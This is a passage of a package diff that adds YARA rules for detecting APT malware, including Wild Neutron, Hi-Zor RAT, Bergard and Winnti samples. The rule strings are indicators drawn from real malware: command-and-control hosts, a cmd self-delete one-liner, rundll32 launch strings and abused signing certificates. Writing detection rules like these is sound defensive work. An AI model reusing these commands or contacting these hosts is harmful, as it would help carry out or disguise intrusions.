+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		date = "2015-07-10"
+		score = 60
+		hash = "2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94"
+	strings:
+		$s0 = "LiveUpdater.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '25.00' */
+		$s1 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */
+		$s2 = "%d -> %d (default)" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */
+		$s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */
+		$s8 = "id-ce-keyUsage" fullword ascii /* score: '12.00' */
+		$s9 = "Key Usage" fullword ascii /* score: '12.00' */
+		$s32 = "UPDATE_ID" fullword wide /* PEStudio Blacklist: strings */ /* score: '9.00' */
+		$s37 = "id-at-commonName" fullword ascii /* score: '8.00' */
+		$s38 = "2008R2" fullword wide /* PEStudio Blacklist: os */ /* score: '8.00' */
+		$s39 = "RSA-alt" fullword ascii /* PEStudio Blacklist: strings */ /* score: '8.00' */
+		$s40 = "%02d.%04d.%s" fullword wide /* score: '7.02' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 800KB and all of them
+}
+
+rule WildNeutron_Sample_2 {
+	meta:
+		description = "Wild Neutron APT Sample Rule - file 8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		date = "2015-07-10"
+		score = 60
+		hash = "8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f"
+	strings:
+		$s0 = "rundll32.exe \"%s\",#1" fullword wide /* PEStudio Blacklist: strings */ /* score: '33.00' */
+		$s1 = "IgfxUpt.exe" fullword wide /* score: '20.00' */
+		$s2 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */
+		$s3 = "Intel(R) Common User Interface" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */
+		$s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */
+		$s11 = "Key Usage" fullword ascii /* score: '12.00' */
+		$s12 = "Intel Integrated Graphics Updater" fullword wide /* PEStudio Blacklist: strings */ /* score: '12.00' */
+		$s13 = "%sexpires on    : %04d-%02d-%02d %02d:%02d:%02d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '11.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 600KB and all of them
+}
+
+rule WildNeutron_Sample_3 {
+	meta:
+		description = "Wild Neutron APT Sample Rule - file c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		date = "2015-07-10"
+		score = 60
+		hash = "c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0"
+	strings:
+		$x1 = "178.162.197.9" fullword ascii /* score: '9.00' */
+		$x2 = "\"http://fw.ddosprotected.eu:80 /opts resolv=drfx.chickenkiller.com\"" fullword wide /* PEStudio Blacklist: strings */ /* score: '33.00' */
+		$x3 = ".chickenkiller.com" ascii /* PEStudio Blacklist: strings */ /* score: '28.00' */
+		
+		$s1 = "LiveUpdater.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '25.00' */
+		$s2 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */
+		$s3 = "%d -> %d (default)" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */
+		$s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */
+		$s5 = "id-at-serialNumber" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */
+		$s6 = "ECDSA with SHA256" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */
+		$s7 = "Acer LiveUpdater" fullword wide /* PEStudio Blacklist: strings */ /* score: '10.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 2020KB and 
+		( 1 of ($x*) or all of ($s*) )
+}
+
+rule WildNeutron_Sample_4 {
+	meta:
+		description = "Wild Neutron APT Sample Rule - file b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		date = "2015-07-10"
+		score = 60
+		hash = "b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45"
+	strings:
+		$x1 = "WinRAT-Win32-Release.exe" fullword ascii /* score: '22.00' */
+
+		$s0 = "rundll32.exe \"%s\",#1" fullword wide /* PEStudio Blacklist: strings */ /* score: '33.00' */
+		$s1 = "RtlUpd.EXE" fullword wide /* score: '20.00' */
+		$s2 = "RtlUpd.exe" fullword wide /* score: '20.00' */
+		$s3 = "Driver Update and remove for Windows x64 or x86_32" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */
+		$s4 = "Realtek HD Audio Update and remove driver Tool" fullword wide /* PEStudio Blacklist: strings */ /* score: '16.00' */
+		$s5 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */
+		$s6 = "Key Usage" fullword ascii /* score: '12.00' */
+		$s7 = "id-at-serialNumber" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1240KB and all of them
+}
+
+rule WildNeutron_Sample_5 {
+	meta:
+		description = "Wild Neutron APT Sample Rule - file 1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		date = "2015-07-10"
+		score = 60
+		hash = "1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206"
+	strings:
+		$s0 = "LiveUpdater.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '25.00' */
+		$s1 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */
+		$s2 = "%d -> %d (default)" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */
+		$s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */
+		$s4 = "sha-1WithRSAEncryption" fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */
+		$s5 = "Postal code" fullword ascii /* PEStudio Blacklist: strings */ /* score: '14.00' */
+		$s6 = "id-ce-keyUsage" fullword ascii /* score: '12.00' */
+		$s7 = "Key Usage" fullword ascii /* score: '12.00' */
+		$s8 = "TLS-RSA-WITH-3DES-EDE-CBC-SHA" fullword ascii /* PEStudio Blacklist: strings */ /* score: '11.00' */
+		$s9 = "%02d.%04d.%s" fullword wide /* score: '7.02' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule WildNeutron_Sample_6 {
+	meta:
+		description = "Wild Neutron APT Sample Rule - file 4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		date = "2015-07-10"
+		score = 60
+		hash = "4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865"
+	strings:
+		$s0 = "mshtaex.exe" fullword wide /* score: '20.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 310KB and all of them
+}
+
+rule WildNeutron_Sample_7 {
+	meta:
+		description = "Wild Neutron APT Sample Rule - file a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		date = "2015-07-10"
+		score = 60
+		hash = "a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c"
+	strings:
+		$s0 = "checking match for '%s' user %s host %s addr %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '24.00' */
+		$s1 = "PEM_read_bio_PrivateKey failed" fullword ascii /* PEStudio Blacklist: strings */ /* score: '23.00' */
+		$s2 = "usage: %s [-ehR] [-f log_facility] [-l log_level] [-u umask]" fullword ascii /* score: '23.00' */
+		$s3 = "%s %s for %s%.100s from %.200s port %d%s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '23.00' */
+		$s4 = "clapi32.dll" fullword ascii /* score: '21.00' */
+		$s5 = "Connection from %s port %d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '17.00' */
+		$s6 = "/usr/etc/ssh_known_hosts" fullword ascii /* PEStudio Blacklist: strings */ /* score: '16.00' */
+		$s7 = "Version: %s - %s %s %s %s" fullword ascii /* score: '16.00' */
+		$s8 = "[-] connect()" fullword ascii /* PEStudio Blacklist: strings */ /* score: '13.00' */
+		$s9 = "/bin/sh /usr/etc/sshrc" fullword ascii /* score: '12.42' */
+		$s10 = "kexecdhs.c" fullword ascii /* score: '12.00' */
+		$s11 = "%s: setrlimit(RLIMIT_FSIZE, { 0, 0 }): %s" fullword ascii /* score: '11.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 5000KB and all of them
+}
+
+rule WildNeutron_Sample_8 {
+	meta:
+		description = "Wild Neutron APT Sample Rule - file 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		date = "2015-07-10"
+		score = 60
+		hash = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92"
+	strings:
+		$x1 = "RunFile: couldn't load SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */
+		$x2 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '35.00' */
+		$x3 = "Error executing CreateProcess()!!" fullword wide /* PEStudio Blacklist: strings */ /* score: '31.00' */
+		$x4 = "cmdcmdline" fullword wide /* score: '11.00' */
+		$x5 = "Invalid input handle!!!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */
+
+		$s1 = "Process %d terminated" fullword wide /* PEStudio Blacklist: strings */ /* score: '24.00' */
+		$s2 = "Process is not running any more" fullword wide /* PEStudio Blacklist: strings */ /* score: '22.00' */
+		$s3 = "javacpl.exe" fullword wide /* score: '3.00' */ /* Goodware String - occured 2 times */
+		$s4 = "Windows NT Version %lu.%lu" fullword wide /* PEStudio Blacklist: os */ /* score: '19.00' */
+		$s5 = "Usage: destination [reference]" fullword wide /* PEStudio Blacklist: strings */ /* score: '16.00' */
+		$s6 = ".com;.exe;.bat;.cmd" fullword wide /* score: '15.00' */
+		$s7 = ") -%s-> %s (" fullword ascii /* score: '14.00' */
+		$s8 = "cmdextversion" fullword wide /* score: '14.00' */
+		$s9 = "Invalid pid (%s)" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.00' */
+		$s10 = "\"%s\" /K %s" fullword wide /* score: '11.02' */
+		$s11 = "Error setting %s (%s)" fullword wide /* score: '11.00' */
+		$s12 = "DEBUG: Cannot allocate memory for ptrNextNode->ptrNext!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */
+		$s13 = "Failed to build full directory path" fullword wide /* score: '10.00' */
+		$s14 = "DEBUG: Cannot allocate memory for ptrFileArray!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '9.00' */
+		$s15 = "%-8s %-3s  %*s %s  %s" fullword wide /* score: '8.00' */
+		$s16 = " %%%c in (%s) do " fullword wide /* score: '8.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1677KB and 2 of ($x*) and 6 of ($s*)
+}
+
+rule WildNeutron_Sample_9 {
+	meta:
+		description = "Wild Neutron APT Sample Rule - file 781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		date = "2015-07-10"
+		score = 60
+		hash = "781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e"
+	strings:
+		$s0 = "http://get.adobe.com/flashplayer/" fullword wide /* PEStudio Blacklist: strings */ /* score: '30.00' */
+		$s1 = "xxxxxxxxxxxxxxxxxxxx" fullword wide /* reversed goodware string 'xxxxxxxxxxxxxxxxxxxx' */ /* score: '19.00' */
+		$s4 = " Player Installer/Uninstaller" fullword wide /* PEStudio Blacklist: strings */ /* score: '11.42' */
+		$s5 = "Adobe Flash Plugin Updater" fullword wide /* PEStudio Blacklist: strings */ /* score: '11.00' */
+		$s6 = "uSOFTWARE\\Adobe" fullword wide /* PEStudio Blacklist: strings */ /* score: '10.42' */
+		$s11 = "2008R2" fullword wide /* PEStudio Blacklist: os */ /* score: '8.00' */
+		$s12 = "%02d.%04d.%s" fullword wide /* score: '7.02' */
+		$s13 = "%d -> %d" fullword wide /* score: '7.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 500KB and all of them
+}
+
+rule WildNeutron_Sample_10 {
+	meta:
+		description = "Wild Neutron APT Sample Rule - file 1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		date = "2015-07-10"
+		score = 60
+		hash = "1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7"
+	strings:
+		$n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '46.00' */
+		
+		$s1 = "%SYSTEMROOT%\\temp\\_dbg.tmp" fullword ascii /* PEStudio Blacklist: strings */ /* score: '37.00' */
+		$s2 = "%SYSTEMROOT%\\SysWOW64\\mspool.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */
+		$s3 = "%SYSTEMROOT%\\System32\\dpcore16t.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */
+		$s4 = "%SYSTEMROOT%\\System32\\wdigestEx.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */
+		$s5 = "%SYSTEMROOT%\\System32\\mspool.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.17' */
+		$s6 = "%SYSTEMROOT%\\System32\\kernel32.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '36.00' */
+		$s7 = "%SYSTEMROOT%\\SysWOW64\\iastor32.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */
+		$s8 = "%SYSTEMROOT%\\System32\\msvcse.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */
+		$s9 = "%SYSTEMROOT%\\System32\\mshtaex.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */
+		$s10 = "%SYSTEMROOT%\\System32\\iastor32.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */
+		$s11 = "%SYSTEMROOT%\\SysWOW64\\mshtaex.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '31.17' */
+		
+		$x1 = "wdigestEx.dll" fullword ascii /* PEStudio Blacklist: strings */ /* score: '26.00' */
+		$x2 = "dpcore16t.dll" fullword ascii /* score: '21.00' */
+		$x3 = "mspool.dll" fullword ascii /* score: '21.00' */
+		$x4 = "msvcse.exe" fullword ascii /* score: '20.00' */
+		$x5 = "mshtaex.exe" fullword wide /* score: '20.00' */
+		$x6 = "iastor32.exe" fullword ascii /* score: '20.00' */
+
+		$y1 = "Installer.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '25.00' */
+		$y2 = "Info: Process %s" fullword ascii /* PEStudio Blacklist: strings */ /* score: '21.00' */
+		$y3 = "Error: GetFileTime %s 0x%x" fullword ascii /* score: '17.00' */
+		$y4 = "Install succeeded" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */
+		$y5 = "Error: RegSetValueExA 0x%x" fullword ascii /* score: '9.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 400KB and 
+		(
+			$n1 or ( 1 of ($s*) and 1 of ($x*) and 3 of ($y*) ) 
+		)
+}
+
+/* Super Rules ------------------------------------------------------------- */
+
+rule WildNeutron_javacpl {
+	meta:
+		description = "Wild Neutron APT Sample Rule - from files 683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9, 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92, 8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a"
+		author = "Florian Roth"
+		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+		date = "2015-07-10"
+		score = 60
+		super_rule = 1
+		hash1 = "683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9"
+		hash2 = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92"
+		hash3 = "8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a"
+	strings:
+		$x1 = "javacpl.exe" fullword wide /* score: '3.00' */ /* Goodware String - occured 2 times */
+
+		$s0 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '35.00' */
+		$s1 = "Error executing CreateProcess()!!" fullword wide /* PEStudio Blacklist: strings */ /* score: '31.00' */
+		$s2 = "http://www.java.com/en/download/installed.jsp?detect=jre" fullword ascii /* PEStudio Blacklist: strings */ /* score: '28.00' */
+		$s3 = "RunFile: couldn't load SHELL32.DLL!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */
+		$s4 = "Process is not running any more" fullword wide /* PEStudio Blacklist: strings */ /* score: '22.00' */
+		$s6 = "Windows NT Version %lu.%lu" fullword wide /* PEStudio Blacklist: os */ /* score: '19.00' */
+		$s7 = "Usage: destination [reference]" fullword wide /* PEStudio Blacklist: strings */ /* score: '16.00' */
+		$s8 = "Invalid input handle!!!" fullword ascii /* PEStudio Blacklist: strings */ /* score: '15.00' */
+		$s9 = ".com;.exe;.bat;.cmd" fullword wide /* score: '15.00' */
+		$s10 = ") -%s-> %s (" fullword ascii /* score: '14.00' */
+		$s11 = "cmdextversion" fullword wide /* score: '14.00' */
+		$s12 = "Invalid pid (%s)" fullword wide /* PEStudio Blacklist: strings */ /* score: '13.00' */
+		$s13 = "\"%s\" /K %s" fullword wide /* score: '11.02' */
+		$s14 = "Error setting %s (%s)" fullword wide /* score: '11.00' */
+		$s16 = "cmdcmdline" fullword wide /* score: '11.00' */
+		$s39 = "2008R2" fullword ascii /* PEStudio Blacklist: os */ /* score: '8.00' */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1677KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_win32_dll_bergard_pgv_pvid_variant.yar remnux-rules-0.0.4/yara/malware/APT_win32_dll_bergard_pgv_pvid_variant.yar
--- remnux-rules-0.0.3/yara/malware/APT_win32_dll_bergard_pgv_pvid_variant.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_win32_dll_bergard_pgv_pvid_variant.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,28 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule apt_win32_dll_bergard_pgv_pvid_variant
+{
+
+    meta:
+        copyright = "Fidelis Cybersecurity"
+        reference = "http://www.threatgeek.com/2016/05/turbo-twist-two-64-bit-derusbi-strains-converge.html"
+    strings:
+        $ = "Accept:"
+        $ = "User-Agent: %s"
+        $ = "Host: %s:%d"
+        $ = "Cache-Control: no-cache"
+        $ = "Connection: Keep-Alive"
+        $ = "Cookie: pgv_pvid="
+        $ = "Content-Type: application/x-octet-stream"
+        $ = "User-Agent: %s"
+        $ = "Host: %s:%d"
+        $ = "Pragma: no-cache"
+        $ = "Connection: Keep-Alive"
+        $ = "HTTP/1.0"
+
+    condition:
+
+        (uint16(0) == 0x5A4D) and (all of them)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_win32_dll_rat_hiZorRAT.yar remnux-rules-0.0.4/yara/malware/APT_win32_dll_rat_hiZorRAT.yar
--- remnux-rules-0.0.3/yara/malware/APT_win32_dll_rat_hiZorRAT.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_win32_dll_rat_hiZorRAT.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,35 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule apt_win32_dll_rat_hiZorRAT
+{             
+               meta:
+                              hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
+                              hash2 = "d9821468315ccd3b9ea03161566ef18e"
+                              hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
+                              ref1 = "http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html"
+                              ref2 = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
+                             
+               strings:
+                             
+                              // Part of the encoded User-Agent = Mozilla
+                              $ = { c7 [5] 40 00 62 00 c7 [5] 77 00 64 00 c7 [5] 61 00 61 00 c7 [5] 6c 00 } 
+                             
+                              // XOR to decode User-Agent after string stacking 0x10001630
+                              $ = { 66 [7] 0d 40 83 ?? ?? 7c ?? } 
+                             
+                              // XOR with 0x2E - 0x10002EF6
+                             
+                              $ = { 80 [2] 2e 40 3b ?? 72 ?? } 
+                             
+                              $ = "CmdProcessExited" wide ascii
+                              $ = "rootDir" wide ascii
+                              $ = "DllRegisterServer" wide ascii
+                              $ = "GetNativeSystemInfo" wide ascii
+                              $ = "%08x%08x%08x%08x" wide ascii
+                             
+               condition:
+                              (uint16(0) == 0x5A4D or uint32(0) == 0x4464c457f) and (all of them)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Winnti.yar remnux-rules-0.0.4/yara/malware/APT_Winnti.yar
--- remnux-rules-0.0.3/yara/malware/APT_Winnti.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Winnti.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,134 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-10-10
+	Identifier: Winnti Malware
+*/
+
+rule Winnti_signing_cert {
+	meta:
+		description = "Detects a signing certificate used by the Winnti APT group"
+		author = "Florian Roth"
+		reference = "https://securelist.com/analysis/publications/72275/i-am-hdroot-part-1/"
+		date = "2015-10-10"
+		score = 75
+		hash1 = "a9a8dc4ae77b1282f0c8bdebd2643458fc1ceb3145db4e30120dd81676ff9b61"
+		hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
+	strings:
+		$s1 = "Guangzhou YuanLuo Technology Co." ascii
+		$s2 = "Guangzhou YuanLuo Technology Co.,Ltd" ascii
+		$s3 = "$Asahi Kasei Microdevices Corporation0" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 700KB and 1 of them
+}
+
+rule Winnti_malware_Nsiproxy {
+	meta:
+		description = "Detects a Winnti rootkit"
+		author = "Florian Roth"
+		date = "2015-10-10"
+		score = 75
+		hash1 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
+		hash2 = "cf1e006694b33f27d7c748bab35d0b0031a22d193622d47409b6725b395bffb0"
+		hash3 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
+		hash4 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
+		hash5 = "ba7ccd027fd2c826bbe8f2145d5131eff906150bd98fe25a10fbee2c984df1b8"
+	strings:
+		$x1 = "\\Driver\\nsiproxy" fullword wide
+
+		$a1 = "\\Device\\StreamPortal" fullword wide
+		$a2 = "\\Device\\PNTFILTER" fullword wide
+
+		$s1 = "Cookie: SN=" fullword ascii
+		$s2 = "\\BaseNamedObjects\\_transmition_synchronization_" fullword wide
+		$s3 = "Winqual.sys" fullword wide
+		$s4 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
+		$s5 = "http://www.wasabii.com.tw 0" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and $x1 and 1 of ($a*) and 2 of ($s*)
+}
+
+rule Winnti_malware_UpdateDLL {
+	meta:
+		description = "Detects a Winnti malware - Update.dll"
+		author = "Florian Roth"
+		reference = "VTI research"
+		date = "2015-10-10"
+		score = 75
+		hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
+		hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
+		hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
+		hash4 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
+	strings:
+		$c1 = "'Wymajtec$Tima Stempijg Sarviges GA -$G2" fullword ascii
+		$c2 = "AHDNEAFE1.sys" fullword ascii
+		$c3 = "SOTEFEHJ3.sys" fullword ascii
+		$c4 = "MainSYS64.sys" fullword ascii
+
+		$s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide
+		$s2 = "Update.dll" fullword ascii
+		$s3 = "\\\\.\\pipe\\usbpcex%d" fullword wide
+		$s4 = "\\\\.\\pipe\\usbpcg%d" fullword wide
+		$s5 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" fullword wide
+		$s6 = "\\??\\pipe\\usbpcg%d" fullword wide
+		$s7 = "\\??\\pipe\\usbpcex%d" fullword wide
+		$s8 = "HOST: %s" fullword ascii
+		$s9 = "$$$--Hello" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1000KB and
+		(
+			( 1 of ($c*) and 3 of ($s*) ) or all of ($s*)
+		)
+}
+rule Winnti_malware_FWPK {
+	meta:
+		description = "Detects a Winnti malware - FWPKCLNT.SYS"
+		author = "Florian Roth"
+		reference = "VTI research"
+		date = "2015-10-10"
+		score = 75
+		hash1 = "1098518786c84b0d31f215122275582bdcd1666653ebc25d50a142b4f5dabf2c"
+		hash2 = "9a684ffad0e1c6a22db1bef2399f839d8eff53d7024fb014b9a5f714d11febd7"
+		hash3 = "a836397817071c35e24e94b2be3c2fa4ffa2eb1675d3db3b4456122ff4a71368"
+	strings:
+		$s0 = "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\" fullword wide
+		$s1 = "%x:%d->%x:%d, Flag %s%s%s%s%s, seq %u, ackseq %u, datalen %u" fullword ascii
+		$s2 = "FWPKCLNT.SYS" fullword ascii
+		$s3 = "Port Layer" fullword wide
+		$s4 = "%x->%x, icmp type %d, code %d" fullword ascii
+		$s5 = "\\BaseNamedObjects\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28E}" fullword wide
+		$s6 = "\\Ndi\\Interfaces" fullword wide
+		$s7 = "\\Device\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28F}" fullword wide
+		$s8 = "Bad packet" fullword ascii
+		$s9 = "\\BaseNamedObjects\\EKV0000000000" fullword wide
+		$s10 = "%x->%x" fullword ascii
+		$s11 = "IPInjectPkt" fullword ascii /* Goodware String - occured 6 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 642KB and all of them
+}
+
+rule Winnti_malware_StreamPortal_Gen {
+	meta:
+		description = "Detects a Winnti malware - Streamportal"
+		author = "Florian Roth"
+		reference = "VTI research"
+		date = "2015-10-10"
+		score = 75
+		hash1 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
+		hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
+		hash3 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
+	strings:
+		$s0 = "Proxies destination address/port for TCP" fullword wide
+		$s3 = "\\Device\\StreamPortal" fullword wide
+		$s4 = "Transport-Data Proxy Sub-Layer" fullword wide
+		$s5 = "Cookie: SN=" fullword ascii
+		$s6 = "\\BaseNamedObjects\\_transmition_synchronization_" fullword wide
+		$s17 = "NTOSKRNL.EXE" fullword wide /* Goodware String - occured 4 times */
+		$s19 = "FwpsReferenceNetBufferList0" fullword ascii /* Goodware String - occured 5 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 275KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Win_Pipcreat.yar remnux-rules-0.0.4/yara/malware/APT_Win_Pipcreat.yar
